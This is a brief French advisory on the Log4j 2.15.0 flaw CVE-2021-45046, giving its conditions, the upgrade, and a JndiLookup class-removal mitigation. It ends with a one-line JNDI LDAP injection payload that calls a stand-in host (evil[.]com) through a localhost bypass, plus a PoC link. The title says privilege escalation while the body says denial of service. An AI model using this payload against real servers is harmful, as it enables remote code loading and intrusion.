
Log4j 2.15.0 Escalade de privilèges -- CVE-2021-45046

Il a été constaté que le correctif pour résoudre CVE-2021-44228 dans Apache Log4j 2.15.0 était incomplet dans certaines configurations non par défaut. Cela pourrait permettre à des attaquants ayant le contrôle sur les données d’entrée du Thread Context Map (MDC) lorsque la configuration de journalisation utilise un Pattern Layout non par défaut avec soit une Context Lookup (par exemple, $${ctx:loginId}) ou un modèle de Thread Context Map (%X, %mdc, ou %MDC) de concevoir des données d’entrée malveillantes à l’aide d’un modèle JNDI Lookup, entraînant une attaque par déni de service (DOS). Log4j 2.15.0 limite les recherches JNDI LDAP à localhost par défaut. Notez que les précédentes atténuations impliquant une configuration telle que définir la propriété système log4j2.noFormatMsgLookup à true n’atténuent PAS cette vulnérabilité spécifique. Log4j 2.16.0 corrige ce problème en supprimant la prise en charge des modèles de recherche de message et en désactivant la fonctionnalité JNDI par défaut. Ce problème peut être atténué dans les versions antérieures (<2.16.0) en supprimant la classe JndiLookup du classpath (exemple : zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Poc
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}
https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j